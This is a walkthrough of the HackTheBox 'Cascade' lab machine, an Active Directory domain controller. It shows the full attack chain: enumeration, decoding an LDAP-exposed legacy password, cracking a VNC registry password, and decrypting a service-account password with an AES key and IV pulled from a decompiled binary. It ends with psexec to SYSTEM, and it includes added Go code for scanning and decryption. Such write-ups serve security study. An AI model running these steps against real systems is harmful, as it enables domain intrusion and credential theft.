HackTheBox - Cascade | Walkthrough

Enumeration
Let's start!
First let's create a directory for this box.
mkdir ~/hackthebox/cascade
cd ~/hackthebox/cascade
Now, to find out what's going on in the box, let's run nmap.
nmap -A 10.10.10.182 -o nmap
# Nmap 7.80 scan initiated Sun Mar 29 21:47:34 2020 as: nmap -A -o nmap 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.19s latency).
Not shown: 987 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-29 16:02:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|general purpose|specialized
Running (JUST GUESSING): Microsoft Windows Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -26s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-29T16:03:43
|_ start_date: 2020-03-29T15:28:10
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 186.64 ms 10.10.14.1
2 186.82 ms 10.10.10.182
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 29 21:51:46 2020 -- 1 IP address (1 host up) scanned in 251.67 seconds
Now, as with most Windows boxes, I like to run enum4linux. Let's see if it gives us something.
enum4linux -a 10.10.10.182 | tee enum4linux
So we got a list of users; let's extract it.
cat enum4linux | grep "Account: " | awk '{print $8}' | tee users.txt
a.turnbull
arksvc
b.hanson
BackupSvc
CascGuest
d.burman
e.crowe
i.croft
j.allen
j.goodhand
j.wakefield
r.thompson
s.hickson
s.smith
util
Let's add the domain name to our /etc/hosts file.
vi /etc/hosts
10.10.10.182 cascade.local
Let's try ldapsearch as well.
ldapsearch -h 10.10.10.182 -p 389 -x -b "dc=cascade,dc=local" | tee ldapsearch
Wow, that's a lot of data. The takeaway, from the entry for user r.thompson:
cascadeLegacyPwd: clk0bjVldmE=
operatingSystem: Windows Server 2008 R2 Standard
operatingSystemVersion: 6.1 (7601)
operatingSystemServicePack: Service Pack 1
Interesting: that looks like a base64 string, so let's decode it.
root@kali:~/hackthebox/cascade# echo "clk0bjVldmE=" | base64 -d
rY4n5eva
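As an added example (not part of the original walkthrough), here is a small Go scanner over ldapsearch's LDIF output that reports every account with a populated cascadeLegacyPwd attribute and decodes it, the check an AD admin would run to find such legacy attributes before an anonymous bind does. The LDIF sample inside it is constructed; only the r.thompson value comes from the page.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
)

// Constructed sample in ldapsearch's LDIF output format: one entry carrying
// the custom attribute (value as on the page) and one without.
const sampleLDIF = `dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: s.smith
`

// FindLegacyPasswords returns sAMAccountName -> decoded cascadeLegacyPwd for
// every entry carrying the attribute. Entries are separated by blank lines and
// folded continuation lines (leading space) are joined first. The attribute
// value is itself base64, which is how this box stores the cleartext.
func FindLegacyPasswords(ldif string) map[string]string {
	found := map[string]string{}
	ldif = strings.ReplaceAll(strings.ReplaceAll(ldif, "\r\n", "\n"), "\n ", "")
	for _, entry := range strings.Split(ldif, "\n\n") {
		sam, pwd := "", ""
		for _, line := range strings.Split(entry, "\n") {
			name, val, ok := strings.Cut(line, ":")
			if !ok {
				continue
			}
			val = strings.TrimSpace(val)
			switch strings.ToLower(name) {
			case "samaccountname":
				sam = val
			case "cascadelegacypwd":
				pwd = val // keep the raw value if it does not decode
				if b, err := base64.StdEncoding.DecodeString(val); err == nil {
					pwd = string(b)
				}
			}
		}
		if sam != "" && pwd != "" {
			found[sam] = pwd
		}
	}
	return found
}

func main() {
	for user, pw := range FindLegacyPasswords(sampleLDIF) {
		fmt.Printf("%s: cascadeLegacyPwd is set (decodes to %q)\n", user, pw)
	}
}
```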
Now, let's try these creds with crackmapexec.
root@kali:~/hackthebox/cascade# crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva
CME 10.10.10.182:445 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME 10.10.10.182:445 CASC-DC1 [+] CASCADE\r.thompson:rY4n5eva
[*] KTHXBYE!
Nice. Now, let's try to list shares.
root@kali:~/hackthebox/cascade# crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares
CME 10.10.10.182:445 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME 10.10.10.182:445 CASC-DC1 [+] CASCADE\r.thompson:rY4n5eva
CME 10.10.10.182:445 CASC-DC1 [+] Enumerating shares
CME 10.10.10.182:445 CASC-DC1 SHARE Permissions
CME 10.10.10.182:445 CASC-DC1 ----- -----------
CME 10.10.10.182:445 CASC-DC1 ADMIN$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 IPC$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 SYSVOL READ
CME 10.10.10.182:445 CASC-DC1 Audit$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 C$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 print$ READ
CME 10.10.10.182:445 CASC-DC1 NETLOGON READ
CME 10.10.10.182:445 CASC-DC1 Data READ
[*] KTHXBYE!
User
So, we have read permissions on some of the shares. Now, let's try to access them!
root@kali:~/hackthebox/cascade# smbclient -U r.thompson \\\\10.10.10.182\\Data
Enter WORKGROUP\r.thompson's password:
smb: \> ls
smb: \> recurse on
smb: \> ls
You should see that there is a Meeting_Notes_June_2018.html file in Email archives. It looks interesting, so let's see what it is.
The email mentions a temporary account, TempAdmin, whose password is said to be the "normal admin account password". Interesting.
You should also find another file, VNC Install.reg.
If you download that file and cat it, you should see a hex-encoded password.
cat VNC\ Install.reg
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
Searching for a VNC password decoder, you should find this GitHub repo:
https://github.com/trinitronx/vncpasswd.py
root@kali:~/hackthebox/cascade# git clone https://github.com/trinitronx/vncpasswd.py.git vncpasswd.py
cd vncpasswd.py
root@kali:~/hackthebox/cascade# ./vncpasswd.py -d -H 6bcf2a4b6e5aca0f
Cannot read from Windows Registry on a Linux system
Cannot write to Windows Registry on a Linux system
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'
Now, we have Steve's password.
Let's try to login using evil-winrm.
./evil-winrm.rb -i 10.10.10.182 -u s.smith -p sT333ve2
Nice, we are in.
User 2
*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=============== ==============================================
cascade\s.smith S-1-5-21-3332504370-1206983947-1165150453-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Audit Share Alias S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Now, let's get winPEAS.
*Evil-WinRM* PS C:\Users\s.smith\Documents> upload /root/hackthebox/remote/winPEAS.exe .
Run winPEAS.exe
.\winPEAS.exe
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : CASCADE
DefaultUserName : vbscrub
[+] Unnattend Files()
C:\Windows\Panther\Unattend.xml
<Password>*SENSITIVE*DATA*DELETED*</Password> <Enabled>true</Enabled> <Username>vbscrub</Username> </AutoLogon> <UserAccounts> <LocalAccounts> <LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
Now, let's see if we can do some things with these credentials that we couldn't do earlier.
root@kali:~/Desktop# crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2
CME 10.10.10.182:445 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME 10.10.10.182:445 CASC-DC1 [+] CASCADE\s.smith:sT333ve2
[*] KTHXBYE!
root@kali:~/Desktop# crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2 --shares
CME 10.10.10.182:445 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME 10.10.10.182:445 CASC-DC1 [+] CASCADE\s.smith:sT333ve2
CME 10.10.10.182:445 CASC-DC1 [+] Enumerating shares
CME 10.10.10.182:445 CASC-DC1 SHARE Permissions
CME 10.10.10.182:445 CASC-DC1 ----- -----------
CME 10.10.10.182:445 CASC-DC1 ADMIN$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 IPC$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 SYSVOL READ
CME 10.10.10.182:445 CASC-DC1 Audit$ READ
CME 10.10.10.182:445 CASC-DC1 C$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 print$ READ
CME 10.10.10.182:445 CASC-DC1 NETLOGON READ
CME 10.10.10.182:445 CASC-DC1 Data READ
[*] KTHXBYE!
Now, let's enumerate those shares, starting with the one r.thompson could not read: Audit$.
smbclient -U s.smith \\\\10.10.10.182\\Audit$
smb: \> ls
smb: \> recurse on
smb: \> ls
We see a few interesting files here: Audit.db, CascAudit.exe and RunAudit.bat.
Let's download all of them.
smb: \> get CascAudit.exe
smb: \> get RunAudit.bat
smb: \> get DB\Audit.db
Now, on our Kali machine, let's see what's in the bat file.
cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"
Hmm, it seems the batch file runs the exe and passes the Audit.db file to it as a parameter.
If we check the Audit.db file, we should see that it's a database file with a password column. However, the password value is base64 encoded, and just decoding it gives us unreadable bytes rather than a password.
So the stored password must be encrypted, and CascAudit.exe is presumably what encrypts and decrypts it.
It seems we will need to get the CascCrypto.dll file as well.
smb: \> get CascCrypto.dll
So, it's reverse engineering. I haven't done much of it, and just thinking of it I'm kinda getting pissed.
Download the decompiler from here:
https://github.com/icsharpcode/AvaloniaILSpy
mkdir /tools/ILSpy/
mv ILSpy-linux-x64-Release.zip /tools/ILSpy/
cd /tools/ILSpy/
unzip ILSpy-linux-x64-Release.zip
chmod a+x ILSpy
./ILSpy
Opening the DLL in ILSpy, we see that it uses AES in CBC mode with a hard-coded IV:
public static string DecryptString(string EncryptedString, string Key)
{
    //Discarded unreachable code: IL_009e
    byte[] array = Convert.FromBase64String(EncryptedString);
    Aes aes = Aes.Create();
    aes.KeySize = 128;
    aes.BlockSize = 128;
    aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842"); // IV is fixed in the binary
    aes.Mode = CipherMode.CBC;
    aes.Key = Encoding.UTF8.GetBytes(Key); // key is passed in by the caller (CascAudit.exe)
    using (MemoryStream stream = new MemoryStream(array))
    {
        using (CryptoStream cryptoStream = new CryptoStream(stream, aes.CreateDecryptor(), CryptoStreamMode.Read))
        {
            byte[] array2 = new byte[checked(array.Length - 1 + 1)];
            cryptoStream.Read(array2, 0, array2.Length);
            return Encoding.UTF8.GetString(array2);
        }
    }
}
Here we have the IV.
Now it seems we need to reverse engineer the exe file as well to get the key. Yikes.
Select the exe file in ILSpy.
Going through it, we find the key.
Type: AES
Key: c4scadek3y654321
IV: 1tdyjCbY1Ix49842
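As an added example, not code from the box or from CascCrypto.dll, here is the same DecryptString logic in Go with the recovered key and IV. Since the Audit.db contents are not reproduced on this page, the sample record is constructed by encrypting the recovered password with the same parameters; the point is that a key and IV hard-coded in a shipped binary make the encryption mere obfuscation, since anyone holding the exe and DLL can decrypt every stored credential.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
)

const (
	cascKey = "c4scadek3y654321" // from CascAudit.exe; 16 bytes, so AES-128
	cascIV  = "1tdyjCbY1Ix49842" // from CascCrypto.dll; fixed for every record
)

// DecryptString mirrors CascCrypto.DecryptString: base64 -> AES-128-CBC with the hard-coded IV -> strip PKCS7 (the .NET Aes default) -> UTF-8.
func DecryptString(encrypted, key string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(encrypted)
	if err != nil {
		return "", err
	}
	block, err := aes.NewCipher([]byte(key))
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext length %d is not a multiple of %d", len(ct), aes.BlockSize)
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(cascIV)).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", fmt.Errorf("bad PKCS7 padding (wrong key?)")
	}
	return string(pt[:len(pt)-n]), nil
}

// EncryptString is the inverse; it exists here only to build a sample record, as the real Audit.db rows are not on the page.
func EncryptString(plain, key string) (string, error) {
	block, err := aes.NewCipher([]byte(key))
	if err != nil {
		return "", err
	}
	n := aes.BlockSize - len(plain)%aes.BlockSize
	pt := append([]byte(plain), bytes.Repeat([]byte{byte(n)}, n)...)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, []byte(cascIV)).CryptBlocks(ct, pt)
	return base64.StdEncoding.EncodeToString(ct), nil
}

func main() {
	enc, _ := EncryptString("w3lc0meFr31nd", cascKey) // constructed sample record
	dec, _ := DecryptString(enc, cascKey)
	fmt.Println(enc, "->", dec)
}
```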
Using CyberChef (https://gchq.github.io/CyberChef/) to decrypt it with that key and IV, we get the password: w3lc0meFr31nd
Phew.
This is the password for the user ArkSvc.
./evil-winrm.rb -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd
Administrator
Damn, this has been one hell of a journey so far. Tough box.
Now, let's just recall the things that we know.
- We know that they use a new account called TempAdmin.
- We know that its password is the same as the normal account.
Following the pattern with this box, let's list the smb shares available to this account!
root@kali:~# crackmapexec smb 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd --shares
CME 10.10.10.182:445 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME 10.10.10.182:445 CASC-DC1 [+] CASCADE\ArkSvc:w3lc0meFr31nd
CME 10.10.10.182:445 CASC-DC1 [+] Enumerating shares
CME 10.10.10.182:445 CASC-DC1 SHARE Permissions
CME 10.10.10.182:445 CASC-DC1 ----- -----------
CME 10.10.10.182:445 CASC-DC1 ADMIN$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 IPC$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 SYSVOL READ
CME 10.10.10.182:445 CASC-DC1 Audit$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 C$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 print$ READ
CME 10.10.10.182:445 CASC-DC1 NETLOGON READ
CME 10.10.10.182:445 CASC-DC1 Data READ
[*] KTHXBYE!
root@kali:~# smbclient -U ArkSvc \\\\10.10.10.182\\Data
Enter WORKGROUP\ArkSvc's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 27 09:12:34 2020
.. D 0 Mon Jan 27 09:12:34 2020
Contractors D 0 Mon Jan 13 07:30:11 2020
Finance D 0 Mon Jan 13 07:30:06 2020
IT D 0 Tue Jan 28 23:49:51 2020
Production D 0 Mon Jan 13 07:30:18 2020
Temps D 0 Mon Jan 13 07:30:15 2020
13106687 blocks of size 4096. 7793454 blocks available
smb: \> recurse on
Doing another ls, you should see that there is a Recycle Bin log file.
smb: \> get IT\Logs\"Ark AD Recycle Bin"\ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \>
If we read the file, we can see that this account has permission to work with the AD Recycle Bin. Also, it seems that the TempAdmin user has recently been deleted. Weird.
Now, let's try to restore the user. First, let's look for the deleted object.
https://docs.microsoft.com/en-us/powershell/module/addsadministration/restore-adobject?view=win10-ps
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
Now, let's try to restore the user.
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject
Insufficient access rights to perform the operation
At line:1 char:80
+ ... ccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
+ FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject
Wait what? Insufficient access rights? Really?
But, still, let's check the properties of the user.
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
Wow, okay we see cascadeLegacyPwd. That's how we got the password of our first user. Let's base64 decode it.
root@kali:~/Desktop# echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles
Now, as mentioned earlier, the password of TempAdmin is the same as that of the normal Administrator account. Let's try to get a shell, using psexec.py this time!
root@kali:/usr/share/doc/python3-impacket/examples# ./psexec.py cascade.local/Administrator:"baCT3r1aN00dles"@10.10.10.182
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.182.....
[*] Found writable share ADMIN$
[*] Uploading file MelpKkvH.exe
[*] Opening SVCManager on 10.10.10.182.....
[*] Creating service tCEG on 10.10.10.182.....
[*] Starting service tCEG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Nice. That's all.
Congratulations! That's one hell of a box!